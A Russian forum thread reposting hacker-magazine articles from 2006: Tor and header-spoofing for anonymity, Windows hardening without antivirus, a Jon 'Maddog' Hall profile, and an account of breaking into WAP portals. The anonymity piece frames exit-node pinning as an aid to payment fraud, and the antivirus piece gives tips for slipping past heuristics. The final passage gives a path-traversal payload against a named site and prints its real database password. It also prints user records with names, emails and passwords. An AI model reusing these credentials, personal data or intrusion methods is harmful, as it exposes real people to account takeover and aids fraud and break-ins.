Вообще, такая система предоставляет тебе кучу плюсов в работе. Помимо постоянно шифрованного соединения, ты получаешь безотказный аниномайзер. Больше не нужно искать прокси и соксы, которые могут вести логи и к тому же дохнут как мухи. Правда, возникает вопрос: что делать, если существует необходимость придерживаться постоянного месторасположения? Например, при совершении платежных злодеяний или посещении ресурсов, позволяющие отправлять свой трафик только юзерам определенной страны. Для этого в конфигурационном файле Tor — torrc — можно использовать специальную директиву StrictExitNodes 1, обозначающую использование на выходе жестко заданных нодов. А сами ноды задать через директиву exitnodes: exitnodes имя нода1, имя нода2 и т.д. Чтобы не делать это вручную, один из разработчиков TOR придумал утилиту — Nodeblock (http://sandos.ath.cx/~badger/nodeblock.html), которая самостоятельно подбирает список, используемых ONION Router'ов (другое название нодов) по географическому месторасположению.

Анонимность по-немецки

В одном из немецких институтов был разработан довольно хитрый способ сохранения анонимности. В систему пользователя устанавливается специальная прокси-программа JAP (http://anon.inf.tu-dresden.de/index_en.html), которая принимает все запросы пользователя на подключения, криптует и в безопасном режиме отправляет на специальный промежуточный сервер (так называемый микс). Фишка в том, что микс одновременно использует огромное количество пользователей, причем система построена так, чтобы каждый из них был неразличим для сервера. А поскольку все клиенты одинаковые, то и вычислить конкретно одного пользователя не представляется возможным. Миксы обычно устанавливаются на добровольных началах, в основном в университетах, и официально подтверждают, что не ведут никаких логов.

Участие пользователя в настройки системы минимально — по сути, ему нужно установить JAP-прокси и выбрать правильный микс. На момент написания статьи в программе доступно 5 анонимных серверов. Для каждого из них выводится различная информация об одновременном количестве пользователей. Выбор обычно неоднозначен: так как чем больше пользователей, тем больше анонимность, но и меньше скорость соединения (ресурсы сервера небезграничны). С другой стороны, можно добиться большей скорости, выбрав менее популярный сервис, но проиграть по уровню безопасности. Кстати говоря, степень анонимности отображается с помощью специальной шкалы.

Что особенно прикольно, так это полная совместимость Tor'а с нодами. Закачав с помощью самой же программы список промежуточных серверов, можно смело их использовать. Причем ты вправе сам указать, из какого количества нодов строить цепочки, как часто их менять и т.д. По умолчанию сервис принимает соединения на 4001 порту, поэтому не забудь прописать проксю 127.0.0.1:4001 в браузере.

Устраиваем маскарад

Во время каждого посещения веб-страницы твой браузер передает массу технической информации. Такие компрометирующие тебя данные, как локализация ОС, версия браузера, часовой пояс, страница, с которой был осуществлен переход, передаются в так называемых переменных окружениях. Их легко отследить, если зайти на сайт www.showmyip.com. Вся информация как на ладони. Замаскироваться под американца легко — достаточно установить английскую версию винды и выбрать правильный часовой пояс. Но в других случаях найти подходящий дистрибутив будет проблематично. Да и вообще, сплошь и рядом встречаются ситуации, когда нужно изменить значения других переменных окружения. Тут и возникает идея: что если в эту компанию добавить некий фильтр между сетью и клиентом, способный изменять HTTP-заголовки на любой лад, вводя в заблуждение любого админа? В этом нам поможет Odysseus (www.wastelands.gen.nz/odysseus/) — сетевой пакет, впервые продемонстрированный на хакерской конференции Defcon и созданный настоящими профессионалами своего дела.

Программа представляет собой мощный конструктор HTTP-запросов, с возможностью на лету изменять куки, GET/POST-запросы, вносить дополнительные параметры, в общем, устраивать полный сетевой беспредел. Физически Odysseus, как и предыдущие программы, представляет собой прокси-сервер, который по умолчанию занимает 50000 порт. В принципе, аналогичные действия можно провернуть с помощью описанной выше Privoxy, но в данном случае все намного проще. Все действия осуществляются через удобную и понятную GUI-оболочку, а поэтому отпадает всякая необходимость заморачиваться с синтаксисом правил и фильтров, как это было в случае с Privoxy. И это круто. Допустим, тебе требуется подменить User Agent (информацию о браузере). Для этого щелкой правой кнопкой по значку программы в трее, затем выбирай инструмент Rewriter (средство для автоматичной подмены передаваемых серверу параметров). В предложенном окне находится список используемых правил: выбираем ^User-Agent и наблюдаем свойства правила. Принцип прост: Одиссей ищет в передаваемом запросе параметр, указанный в поле Match, и заменяет его строкой, заданной в поле Replace. Поэтому единственное, что от тебя требуется, — это вписать значения в нужные поля. Чтобы, например, прикинуться пользователем с Internet Explorer’ом, достаточно вписать в поле Replace строку «User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)». Аналогичным образом можно фильтровать куки (удалять строки Set-Cookie), добавлять новые параметры в запрос (например, для хитрой аутентификации на своем сервисе, которая будет анализировать именно этот параметр) и т.д.

Любые запросы к удаленному серверу перехватываются, а передаваемые в запросе значения переменных легко корректируются, если в Одиссее активирован режим Interceptor. Он аналогичным образом включается через всплывающее меню ярлычка программы в трее — включи его. А теперь попробуй зайти на какой-нибудь сайт. Тут же всплывает окно с указанием всех параметров, каждый из которых легко исправить. Изучи, подправь, что нужно, и жми Done — теперь все параметры, в том числе исправленные, будут переданы на настоящий сервер.

С помощью режима Activity Log’а можно четко проанализировать общение браузера и удаленного сервера — это еще один режим работы программы. Кстати, для каждого из режимов можно назначить горячую клавишу и быстро вызвать нужный из них по хоткею. Это и многое другое настраивается в опциях программы. Штука поистине мощная, и роль подобного инструмента в целях обеспечения безопасности нельзя недооценивать. Очень часто приходится подменять тип используемого браузера в User Agent, затирать Referer. Мне даже приходилось добавлять в запрос поля X-Forwarder, Via и Proxy-connect, чтобы заставить сервер думать, что я работаю через публичный прокси-сервер (официальный, с логами и не вызывающий подозрений).

ИНФО

Ты спрашиваешь, какая система лучше всего подходит для соблюдения анонимности? Отвечаю: Anonym OS (http://sourceforge.net/projects/anonym-os/). Операционка построена на базе OpenBSD и изначально настроена на прозрачное шифрование трафика, а также сохранение анонимности. В том числе средствами Tor. Другие ОС для анонимного серфинга: ELE (www.northernsecurity.net/download/ele/), Virtual Privacy Machine (wiki.noreply.org/noreply/VirtualPrivacyMachine.), Phantomix (http://phantomix.ytternhagen.de/)

WWW

http://tor.eff.org/ — официальный сайт Tor

www.privoxy.org — домашняя страница Privoxy

www.vidalia-project.net/ — удобная GUI-оболочка для управления Tor

http://privacy.hro.org — сайт о приватности и независимости частной жизни в сети




Автор: Metallica Dec 1 2006, 11:15

Антивирус на помойкуЗащищенная ось без антивирусов и тормозов

Некоторые воспринимают антивирус как неотъемлемую часть операционной системы и просто не мыслят свое существование без защитных пакетов от разных производителей, свободно пропускающих заразу, но вызывающих жуткие тормоза и целый ворох конфликтов, вплоть до выпадения в BSOD. Самый лучший антивирус — это сама ось! Нужно только научиться правильно ею пользоваться!

Терминологические войны

Windows NT (и все производные от нее системы — W2K, XP и частично Vista) изначально проектировалась как защищенная оси, способные постоять за себя и дать вирусам решительный отпор без каких-либо дополнительных средств, в том числе и широко разрекламированного Microsoft Anti-Spy-Ware. Но, чтобы не увязнуть в терминах, необходимо уточнить ряд определений.

Условимся называть вирусами саморазмножающиеся программы, паразитирующие на исполняемых файлах, динамических библиотеках, драйверах и других объектах подобного рода. Эпоха вирусов закончилась вместе с крушением MS-DOS, когда единственным средством добычи новых программ были дискеты товарища или, в лучшем случае, FIDO и BBS. С эпидемиологической точки зрения, все это создавало крайне напряженную обстановку. Копировать программы друг у друга — все равно что ширяться из одного шприца. С другой стороны, антивирус годичной давности считается вполне свежим и актуальным. Основными носителями вирусов были люди, а не файлы, поэтому масштабы эпидемии определялись исключительно интенсивностью копирования программ.

С появлением сети пользователи стали закачивать дистрибутивы программ из инета, а вирусам для размножения перестали требоваться люди. Используя дыры в подсистемах безопасности и ошибки типа переполнения буфера, любой вирус буквально за несколько часов может заразить практически все уязвимые узлы, при этом ему совершенно не обязательно внедряться в исполняемые объекты. Зачем привлекать к себе лишнее внимание, когда можно ограничиться временным проживанием в оперативной памяти. Если заражен хотя бы 1% всех машин в сети, то вирус, умирая при перезагрузке, через незаткнутые дыры будет возвращаться вновь и вновь. Такие вирусы принято называть червями, и это один из наиболее распространенных типов компьютерной заразы на сегодняшний день.

Еще существуют «психологические» вирусы, представляющие собой обыкновенные исполняемые файлы и распространяющиеся через вложения электронной почты, ICQ, web и ftp. Свою историю они ведут от «крэкеров интернета», завлекающих бесплатным доступом в сеть, а на самом деле, форматирующим жесткий диск. Этот подкласс заразы назвали Троянским Конем. Сейчас же времена первобытного варварства остались позади, и большинство троянов не уничтожают информацию, поскольку это сделает их пребывание слишком заметным, а скрыто устанавливают шпионскую закладку, похищающую пароли и содержимое электронных кошельков. Такие компьютеры принято называть зомби или дронами. Собрав огромную армию дронов, хакер может совершать распределенные атаки и делать кучу других антисоциальных вещей. Например, рассылать спам.

Антивирусы — за гранью возможного

Антивирусы в настоящее время практически полностью утратили былую значимость и усиленно пытаются отойти от пропасти, на дне которой они находятся. Вирусы, заражающие исполняемые файлы, за последние несколько лет фактически перевелись, к тому же запретить запись в исполняемые файлы средствами операционной системы намного проще, дешевле, быстрее и надежнее, чем устанавливать антивирусный пакет. И уж совсем бессмысленно пытаться лечить зараженные объекты, ведь в любой момент их можно переустановить с дистрибутивной копии, хранящейся на CD-R/RW или скачанной из сети.

Антивирусный монитор, следящий за всеми создаваемыми/открываемыми файлами и проверяющий их на лету, — это дополнительные тормоза (подчас очень значительные): конфликты, критические ошибки, голубые экраны смерти и прочий ничем не оправданный геморрой. Вся проблема в том, что антивирус может ловить только те вирусы, о которых знает, а вирусы сейчас пишут все кому не лень, так что даже при экстраординарной степени оперативности никакой гарантии, что вся зараза будет распознана, у нас нет. Более того, вирус, упакованный слегка подправленной версией крутого протектора, имеет 100% шансы остаться незамеченным! Сложные протекторы уже не распаковываются на эмуляторе ЦП, и для их снятия требуется статический распаковщик, входящий в «движок» антивирусной базы и справляющийся только со строго конкретными версиями протекторов и очень болезненно относящийся даже к незначительным изменениям структуры упакованного файла. Да что там структура! Обычно бывает достаточно внедрить в точку входа jump на инструкцию, неизвестную эмулятору (например, что-нибудь из набора SSE/SSE2), и антивирус идет лесом, поскольку переменная длина x86 инструкций не позволяет ему определить начало следующей машинной команды!

Впрочем, даже если антивирусу удастся побороть упаковщик и передать эвристику, распакованный код никаких вирусных признаков все равно там ни за что не обнаружит, ну разве что это будет пионерский вирус. Наличие незашифрованных текстовых строк с ключами реестра, ответственными за автозапуск, имен исполняемых файлов антивирусных программ, команд в стиле «rm -rf/» с высокой степенью указывает на зловредную программу, но их очень легко зашифровать. Еще эвристик может анализировать таблицу импорта и аргументы, передаваемые функции GetProcAddress. А если там встретится WriteProcessMemory, VirtualAllocEx, CreateRemoteThread или что-то еще в этом роде, он сделает вывод, что имеет дело с программой, способной внедряться в другие процессы. Верный признак червей и отладчиков. Ситуация сильно осложняется тем, что многие вирусные приемы сейчас активно используются протекторами, и, если эвристик не утихомирить, он отправит в топку добрую половину легальных программ, чего допускать ни в коем случае нельзя! Да и вообще, если создатель вируса неглупый человек, то он многократно прогонит его через различные эвристики, добиваясь их полной и безоговорочной капитуляции.

Что же касается червей (и, в частности, нашумевшего MS BLAST, известного также под кличкой Love San), то это вообще песня. Удаляют его антивирусы, не удаляют — что толку? Пока есть дыра, он словно феникс из пепла будет появляться вновь и вновь. К тому же всегда существует вероятность, что кто-то умный напишет свой собственный shell-код, не имеющий с MS BLAST'ом ничего общего, а потому и не детектируемый никаким антивирусом! Некоторые дыры можно закрыть брандмауэром, но в общем случае для этого необходимо установить заплатку от производителя уязвимого продукта, которым может быть как сама ось, так и один из ее компонентов: IE, FireFox и т.д.

Еще существует такой тип антивирусов, как ревизоры, в задачу которых входит проверка целостности существующих файлов и контроль за вновь созданными. Некоторые ревизоры также контролируют и реестр, особенно ветки, прямо или косвенно ответственные за автоматический запуск программ. Во времена MS-DOS это была очень хорошая штука, но сейчас винчестеры так разжирели, что процедура сканирования отнимает кучу времени, к тому же многие сканеры содержат ошибки, позволяющие заразить файл без изменения его контрольной суммы (см. статью «Как подделывают CRC16/32», опубликованную в «Хакере»), не говоря уже о том, что при правильной политике разграничения доступа сводит актуальность сканеров на нет, тем более, начиная с W2K, система сама контролирует целостность жизненно-важных файлов через механизм SFC. Ну вот, сейчас кто-то скажет, что SFC легко обмануть, особенно если вирус стелсируется на уровне ядра или вообще не внедряется ни в какие объекты файловой системы, существуя лишь в виртуальной памяти какого-нибудь процесса.

Контроль над целостностью виртуальной памяти процессоров берут на себя как антивирусы, так и персональные брандмауэры, распознающие и отсекающие все известные способы внедрения в чужое адресное пространство, да вот только работает этот механизм кое-как. Зловредному коду, запущенному с пониженными привилегиями, доступ к чужим процессам можно запретить средствами самой операционной системы, а код, запущенный с правами администратора, пройдет сквозь все уровни защиты, как нож сквозь масло (при условии, что его писал не пионер, а хотя бы комсомолец). Самое неприятное, что существует множество легальных программ, например, мультимедийных клавиатур и мышей, использующих внедрение в чужое адресное пространство для реализации своих мультимедийных возможностей, поэтому слепой запрет брандмауэра/антивируса приведет к их неработоспособности! Значит, необходимо предоставить пользователю возможность выбора. А сможет ли он отличить честную программу от нечестной? Но даже не это самое страшное. Чем глубже внедряется брандмауэр/антивирус в систему, тем сложнее зловредному коду его обойти, но и тем больше конфликтов и глюков он (брандмауэр/антивирус) вызывает.

Получается так, что грамотно настроенной системе никакой антивирус не нужен, а с безграмотной никакой антивирус все равно не справится (брандмауэр стоит ставить только затем, чтобы отделить домашнюю локальную сеть от интернета и следить за сетевой активностью установленных программ, выявляя не только шпионов, но и легальные программы, пытающиеся проверить корректность регистрации).

Никакие, даже самые совершенные антивирусы ни от чего не спасают! При этом они стоят немалых денег, пожирают сетевой трафик частыми обновлениями, вызывают конфликты и тормозят работу системы, между тем система вполне может справиться с вирусами и сама — никакие дополнительные костыли ей не нужны!

Разграничение доступа — попробуй пробей

В отличие, например, от BSD, Windows NT не является многопользовательской операционной системой, поскольку только один пользователь может работать с компьютером в любой момент времени, и прежде чем переключиться на другого, необходимо завершить текущий сеанс, закрыв все приложения, и лишь потом… А вот в BSD все очень просто: нажал Alt-F#, переключился на соседнюю консоль — и все! В Windows XP наконец-то появилась возможность переключения сеансов разных пользователей без завершения, но механизма взаимодействия между пользователями как не было, так и нет.

Правда, в текущем сеансе можно запускать программы от имени другого пользователя, но это, во-первых, совсем не то, а во-вторых, далеко не все программы соглашаются на такой запуск, и еще меньше из них сохраняют свою работоспособность в полном объеме. Так что без бубна здесь не обойтись. Если нет бубна, то сойдет и обычный оцинкованный таз.

Идея противостояния вирусам заключается в выборе правильной политики разграничения доступа, тогда вирус (или другая зловредная программа) просто не сможет напакостить и нанести значительный урон. А для этого все потенциально опасные программы нужно запускать в своеобразной песочнице. В идеале — на виртуальной машине типа VMware, но про VMware мы уже неоднократно писали, а вот про разграничение доступа материалов практически нет.

Начнем с того, что никогда, ни при каких обстоятельствах не следует постоянно сидеть под «администратором», поскольку любая запущенная программа может делать с системой все, что ей вздумается. Под администратором следует заходить в систему только для выполнения «ремонтных» работ — установки новых драйверов, изменения параметров конфигурации и т.д. А все остальное время проводить под «опытным пользователем» или просто «пользователем» с ограниченным доступом. Чем меньше у вас привилегий, тем меньше их и у каждой запущенной вами программы, однако под обыкновенным пользователем многие программы работать отказываются, поскольку требуют записи в каталог Program Files или в другие «злачные» места. Зато потом наступает тишь да гладь — ни вирусов, ни другого малваре.

Необходимость в периодическом резервировании, естественно, до сих пор существует. Надежнее всего резервироваться на CD-R/RW, DVD-RW, ZIP, стримеры и прочие внешние носители информации, однако это непроизводительно, неудобно, да и надежность у винчестеров все же повыше будет, чем у того же CD-RW. Поступим так. Создадим нового пользователя с администраторскими правами (Пуск -> Панель Управления -> пользователи и пароли -> Имя -> Пароль -> Другой -> Администраторы), назовем его, к примеру, «backup», зайдем под его именем в систему, создадим каталог general-stores (то есть общее хранилище) и скопируем туда все, что необходимо. Затем, щелкнув по каталогу правой кнопкой мыши, в появившемся контекстом меню выбираем вкладку «свойства», а там — «безопасность» со списком допущенных лиц. По умолчанию каталог доступен для всех, что никак не входит в наши планы, поэтому удаляем «всех» напрочь, предварительно сбросив галочку «переносить наследуемые от родительского объекта разрешения на этот объект». Все!!! Теперь этот каталог недоступен никому, даже системе! И только владелец, создавший его (то есть «backup»), может войти в раздел «безопасность» и вернуть «всех» на место. Внимание! Администратор не сможет этого сделать! Ну вообще-то, чтобы так не извращаться, после удаления «всех» можно добавить пользователя «backup», делегировав ему полный доступ к каталогу. Все же остальные пользователи, включая членов группы, добраться до этого каталога не смогут. Хорошая защита от вирусов и прочих деструктивных программ, неправда ли? Кстати говоря, задумаемся, а что произойдет, если случайно (преднамеренно) удалить пользователя «backup»? Ведь тогда доступ к архиву не сможет получить никто! К счастью, штатная утилита chkdsk распознает такую ситуацию, и, если видит подобный каталог-зомби, она автоматически возвращает «всех», воскрешая информацию из небытия.

Песочница — не только детская радость

Нашей следующей задачей будет постройка «песочницы» для всех тех программ, что могут быть атакованы из сети, к числу которых принадлежит IE, Fire Fox, Outlook Express, The Bat, ICQ и другие. Каждая из них должна быть запущена из-под ограниченного пользователя, не имеющего доступа ни к каким каталогам, кроме тех, которые явно нужны самой программе. В принципе, можно завести одного ограниченного пользователя на всех, обозвав его, к примеру, «sandbox» (то есть песочница), однако в этом случае червь, пробравшийся через IE, сможет разрушить почтовую базу, накопленную за многие годы, что будет обидно. Поэтому лучше всего дать каждой программе по пользователю (конечно, это увеличивает потребности системы в памяти, но не столь радикально).

Итак, создан ограниченный пользователь «sandbox», в свойствах «безопасности» каждого каталогов (или всех дисков целиков) «sandbox» добавлен, и доступ ему запрещен (политика запрета имеет приоритет над политикой разрешений, поэтому удалять «всех» совершенно не обязательно). По завершению этой нехитрой операции у sandbox'а останутся только те каталоги, которые ему нужны (как правило, это каталоги самой программы, причем без права записи в исполняемые файлы).

Попробуем запустить в песочнице, например, Firefox. Создаем ярлык с firefox.exe (если только это не сделал инсталлятор), щелкаем по нему правой клавишей, идем в «свойства», затем — в «дополнительно» и там взводим галочку «запускать от имени другого пользователя». Говорим «ОК» и запускаем. Появляется грозное диалоговое окно, требующее ввода имени и пароля. Вводим. И… Горящий Лис не запускается! Между прочим, в Linux/BSD подобная операция протекает без каких бы то ни было проблем (в XP и выше проблем с конкретной Firefox также не возникает. — Прим. редактора). А здесь нужен бубен или более конкретно — файловый монитор Марка Руссиновича, показывающий, на каких именно файловых операциях программа обламывается (вот так, значит, разработчики относятся к сообщениям об ошибках). Качаем файловый монитор: www.sysinternals.com/Utilities/Filemon.html (он, кстати, занимает меньше двухсот килобайт и распространяется совершенно бесплатно). Запускаем из-под администратора: создаем ярлык и взводим уже известную нам галочку «запускать от…»! В данном случае файловый монитор запускается, потому что запрограммирован правильно, и мы быстрым спортивным шагом идем в Options -> Filter/Highlight или нажимаем <CTRL-L>. В появившемся диалоговом окне взводим все галочки, кроме «Log Successes», поскольку мониторить успешные операции нам незачем! Нам нужны ошибки! Нажимаем «OK» и перезапускаем программу (фильтр будет действовать только после запуска). Вновь запускаем Горящего Лиса. Что мы видим? Сначала идут ошибки поиска динамических библиотек в тех каталогах, где их нет — это нормально. А вот дальше Горящий Лис пытается создать папку Mozilla прямо в каталоге WINNT (в ней он хранит свои настройки, кэш страниц и т.д.), куда его, естественно, не пускают, и он тихо умирает.

Да… задача. Пробуем утилиту командной строки runas, запустив ее так: «runas /user:sandbox firefox.exe» (при этом firefox.exe должен быть в текущей директории). Нас деловито спрашивают пароль и… ничего! Теперь Горящий Лис лезет в DocumentnSetting\Default User, куда ему также нет доступа! В чем же дело?! В чем причина?! А в том, что для корректной работы большинства программ необходимо загрузить еще и профиль пользователя, от имени которого мы их запускаем, поэтому правильный вариант выглядит так: «runas /profile /user:sandbox firefox.exe». Теперь запуск проходит без проблем!

А вот Опера хранит кэш не в профиле пользователя, а непосредственно в своем каталоге (впрочем, это зависит от ее настроек), поэтому sandbox'у необходимо присвоить права на запись в «program files\opera».

Остальные программы «распутываются» аналогичным образом. Если не помогает файловый монитор, то качаем монитор реестра (www.sysinternals.com/Utilities/Regmon.html) и смотрим, в каких ветвях нуждается программа. Маленький подводный камень: перенаправить ввод с клавиатуры на файл, увы, не удастся, и пароль придется каждый раз вводить вручную, что напрягает. Впрочем, программисты запросто напишут программу, лишенную этих недостатков. Нам же главное — создать кучу пользователей, распределив права доступа так, чтобы зловредные программы не имели никаких шансов ни для размножения, ни для шпионской деятельности.

Заключение

Создание защищенной системы без использования антивирусов — это реально! Пускай на первоначальном этапе нам придется проделать большой объем работы и очень много думать головой, создавая столько пользователей, чтобы полностью изолировать одно потенциально опасное приложение от всех остальных. Зато будешь знать наверняка, что, работая на твоей любимой машине, домашние ничего плохого с ней сделать не смогут.

DVD

На диске ты найдешь полную версию статьи Криса, а также программы, упомянутые в статье.

ИНФО

Если в свойствах папки или файла ты вдруг не обнаружишь вкладки «Безопасность», можешь во всем винить парней из Microsoft. Ребята решили упростить все до безобразия и по умолчанию спрятали эти настройки от ушастого пользователя. Вернуть все на свои места можно через «Проводник -> меню Сервис -> Свойства папки -> Вид», где нужно снять галку с опции «Использовать простой общий доступ к файлам».




Автор: Metallica Dec 1 2006, 13:08

X-Profile: Jon "Maddog" Hall



Краткая биография:

Йон Холл родился в небольшом американском городке штата Нью-Йорк. В 4 года он поставил свой первый эксперимент с техникой, воткнув телевизионную антенну в розетку, в результате чего получил немаленький разряд током и отлетел в противоположную сторону комнаты. Этот опыт оставил неизгладимое впечатление, наглядно продемонстрировав, сколь велика мощь технологий, и повлияв на выбор карьеры. Поступив в Университет Дрекселя, Йон выбрал среди курсов электронную инженерию и компьютерную науку, полностью углубившись в их изучение. В 60-е годы учебных заведений, имеющих узкоспециализированный компьютерный факультет, практически не было. Студентам, которые решили изучать компьютеры, приходилось брать «в нагрузку» дополнительный предмет. Йон взял бизнес-курс. Первыми его компьютерами стали IBM 1130 и PDP-8, на которых он постигал FORTRAN и ассемблер. PDP был особенно привлекательным, так как, в отличие от громоздких мейнфреймов, на этой машине студентам разрешалось работать в любое время. Большую часть знаний Йон постигал сам, читая редкие книги и применяя полученный опыт на практике. Защитив степень бакалавра, он устроился на работу, в фирму Aetna Life and Casualty, где занялся ассемблерным программированием мейнфреймов IBM. А в свободное от работы время продолжал заочное обучение в одном из Нью-Йоркских вузов, готовясь получить степень магистра компьютерных наук. Через 4 года, став магистром, Йон всерьез задумался о возможности преподавания, и в конце концов договорился с руководителем небольшого технического колледжа, где стал вести компьютерный курс. Как потом скажет Йон в одном из своих интервью, это были лучшие годы его жизни - он получал огромное удовольствие от общения и обучения молодежи. Студенты запомнили его как безумно вспыльчивого и строгого профессора, который не делает поблажек ни себе, ни другим. И прозвали его Maddog (сумасшедшая собака) – под этим прозвищем он со временем станет известен всем UNIX-сообществу.

Преподавательская деятельность не приносила большого дохода, и за 3,5 года работы в колледже, Йон задолжал государству $4000. Пришлось принять решение: оставаться и наращивать долг или перейти на работу в успешную коммерческую компанию. Холл выбрал второе, тем более что компания Bell уже давно приглашала талантливого программиста к себе. Ему удвоили зарплату и продолжали ее увеличивать довольно быстрыми темпами. Йон работал главным системным администратором и именно в Bell впервые познакомился с операционной системой UNIX. Правда, карьера в телефонной компании не была долгой. После того как Йон узнал, что Digital Equipment Corporation стартовала группу по разработке собственной UNIX-совместимой системы и набирает штат сотрудников, Maddog решил перейти к ним. Он преклонялся перед DEC еще в институте, работая на их компьютерах, к тому же сам проект обещал быть весьма увлекательным. Работая в Digital Equipment, Йон Холл познакомился со многими интересными людьми, включая Линуса Торвальдса, которому помог портировать Linux на 64-битные процессоры Alpha
Незадолго до приобретения Digital Equipment компанией Compaq, Йона избрали исполнительным директором некоммерческой организации Linux International, и в 1999-м году, когда DEC перешла новому владельцу, профессор Холл оставил свой пост, чтобы все свое время посвятить развитию Linux.

Известные хобби:

Ходить в гости к друзьям, путешествовать, фотографировать, ездить на джипе, встречаться и общаться с линуксоидами.

Проекты:

Основным проектом Йона Холла был и остается Linux. Он написал множество статей об этой ОС в разные газеты и журналы, а также несколько книг для серии «For dummies», включая: «Linux для чайников», «Red Hat Linux Fedora для чайников», «Linux in a Box для чайников» и несколько других..

Чем занимается сейчас:

Йон Maddog Холл объездил с лекциями по Unix и Linux практически весь мир. Он желанный гость на любых технических конференциях и является активным сторонником свободного ПО, продвигая идеи опенсорсного движения в массы. Многие считают его одним из лидеров opensource movement, наряду с Ричардом Столлманом. Параллельно своей работе в Linux International, Maddog сотрудничает с корпорацией Silicon Graphics и поддерживает многие некоммерческие сетевые проекты по опенсорс и программированию (например, USENIX Association).

Цитаты:

«Я хотел бы, чтобы в сутках было 50 часов, или чтобы я умел не спать. Также было бы здорово иметь собственный телепортер, как в Стар Треке, и не тратить времени на бесконечные перелеты».

«Что может сделать меня счастливым? Хорошие друзья, полные энтузиазма студенты и теплый песчаный пляж».

«Больше всего меня злит, когда люди говорят: "Это нельзя сделать"». Обычно это значит «сложно сделать», и я много раз демонстрировал, как вещи, которые считались невозможными, делаются без проблем за несколько часов».

«У русских есть гордость. Они знают, что такое воровство и не любят этого делать. Они видят маленькие пластиковые CD, штамповка которых стоит не больше доллара, и с трудом понимают, почему кто-то продает их по цене $500-600».

«Через 10 лет Linux будет править миром. Возможно, раньше это звучало как шутка, но теперь это очевидно».

«Самая поразительная вещь в Linux – это энтузиазм сообщества, отношение этих людей, которое можно выразить двумя словами: «can do».

«На конференции в Австралии, в 1997-м году я встретил Theo de Raadt, который сообщил о скором закрытии провайдером его сетевого проекта OpenBSD, поскольку он не в состоянии заплатить $300 за хостинг. Я достал чековую книжку и тут же выписал ему чек на $300, вручив со словами: «Твой проект слишком ценен, чтобы позволить ему умереть из-за каких то $300».

«Многие бизнесмены боятся свободы. Они не верят, что качественная вещь может быть бесплатной, что свободный труд может принести пользу. Они полагают, что деньги дают им контроль. Но на самом деле, если говорить о программировании, работники коммерческих компаний пишут программы не потому, что хотят, а потому, что им говорят это делать. Этим они отличаются от опенсорсного движения».




Автор: Metallica Dec 2 2006, 11:30

Мобильный взломИстория взлома крупнейших WAP-сайтов

Каждый день мы пользуемся сервисами крупнейших русскоязычных WAP-сайтов. Но мало кто знает, что эти сайты, как и их собратья в большом инете, содержат уязвимости. Совсем недавно мне удалось поломать некоторые Wap-ресурсы, что доставило немало неприятностей их администраторам. А ломал я через всем известные баги – sql-injection, travers directory и т.п. Удивлен? Я тоже был удивлен, когда находил их на крупных Wap-порталах. А потом привык smile.gif.

Хорошие вап-программеры обычно не пользуются готовыми скриптами, а пишут их сами. А также нередко заказывают нужную программу у хорошего и проверенного человека за N-ную сумму веб-манек. Но в этом и заключается вся опасность: такие мобильные форумы, чаты, даунлод-центры практически всегда имеют какой-нибудь нелепый баг. Здесь все так же, как при взломе обычных ресурсов. Единственная трудность заключается в использовании специального языка разметки wml в wap-страницах. Но тут все так же, как и в простом html. Только не удивляйся тому, что после открытия wap-страницы вместо привычного <form action="" method="post"> ты увидишь какой-то <anchor><go href="" method="post"> smile.gif. Если тебе потребуется внести нехороший символ в одну из переменных, передаваемых скрипту из wml-страницы, нужно будет всего лишь немного осмотреться и действовать по аналогии с html. А вообще, прибегать к просмотру чистого wml приходится крайне редко — все хакерские действия совершаются в строке URL-браузера.

Давай определимся, что мы сможем поиметь от взлома wap-сайта? Бесплатные мелодии и картинки? Это вряд ли, ведь они и так выложены бесплатно. Халявный доступ к платным сервисам и онлайн-играм? Это уже лучше — некоторые ресурсы их действительно предоставляют. Но самую большую выгоду можно получить от продажи исходных кодов эксклюзивных скриптов, расположенных на мобильных порталах. Для экстрималов подойдет способ смены партнерских ссылок на свои smile.gif. То есть все деньги от продажи платного контента партнеров могут пойти тебе в карман. Если, конечно, админ не заметит такой подставы.

А теперь я хочу рассказать несколько поучительных историй взломов известных WAP-порталов со счастливым концом.

wap.kmx.ru - надежный конструктор

Сейчас очень модно создавать мобильные сайты, просматриваемые прямо с экрана сотового телефона. Владельцы этих сервисов-конструкторов получают огромные деньги, размещая рекламные и партнерские ссылки на сайтах своих клиентов. Одним из порталов, предоставляющих такую услугу, является wap.kmx.ru. Пользователям этого конструктора предоставлены широчайшие возможности по созданию и редактированию своих страниц. Как утверждают сами создатели kmx: «Мы - эксперты сайтостроения!». Но так ли это? 20000 пользователей сервиса действительно так считают, а я почему-то сразу не поверил и, зарегистрировав свой сайт с помощью веб-браузера Opera, начал изучать внутреннее устройство скрипта. После недолгого хождения по ссылкам мне посчастливилось наткнуться на такой интересный пункт, как «Импорт файлов через url». Эта фишка позволяет загрузить на свой сайт различный контент для мобильного телефона. Страница раздела содержала 2 поля ввода: «URL» и «Сохранить как...». Недолго думая, я вписал в URL значение ../../../../../../../../etc/passwd, а в поле «Сохранить как...» — passwd.wml. Я представил, что вполне возможно значение http:// указано для красоты, а в скрипте его наличие не проверяется. Действительно, после нехитрого злодеяния в моей папке для wml-страничек появился новый файл с содержанием /etc/passwd smile.gif. Дальше я попробовал прочитать содержимое директории с помощью этой баги. Значки ../../ и функция readfile() помогли мне выйти в корень конструктора. Продолжив изучать по очереди все *.php-скрипты, я наткнулся на параметры доступа к базе данных конструктора в файлике /home/kmx/www/rotation_reklama_25.php.

define("DBName","kmx");

define("HostName","localhost");

define("UserName","kmx");

define("Password","kmx-hosting");

Отличный пароль для такого серьезного проекта. Что удивительно, он подошел к ftp! Получив доступ к серверу, я тут же слил все файлы конструктора и базу данных к себе на жесткий диск. Вот часть дампа базы клиентов этого хостинга-конструктора:

INSERT INTO `users` VALUES (12965,'kmx','tehrana','tehrana','1561554961',0,1112326239,1112326250,'farid','nadirov','nf_m55@mail.ru',0,5242880,0,'');

INSERT INTO `users` VALUES (14642,'kmx','elkatan','yaquboqlu','7381022744',0,1113300485,1113300500,'ELDENIZ','MAMEDOV','elkatan@mail.ru',0,5242880,0,'');

INSERT INTO `users` VALUES (12961,'kmx','skykmxru','mix','2417159245',632235923,1112322498,1112325157,'pavel','Ivanov','',0,5242880,0, '');

INSERT INTO `users` VALUES (12960,'kmx','till','131313','4832612542',955559136,1112320276,1112797484,'Саша','Ященко','tillll@gala.net',0,5242880,0,'');

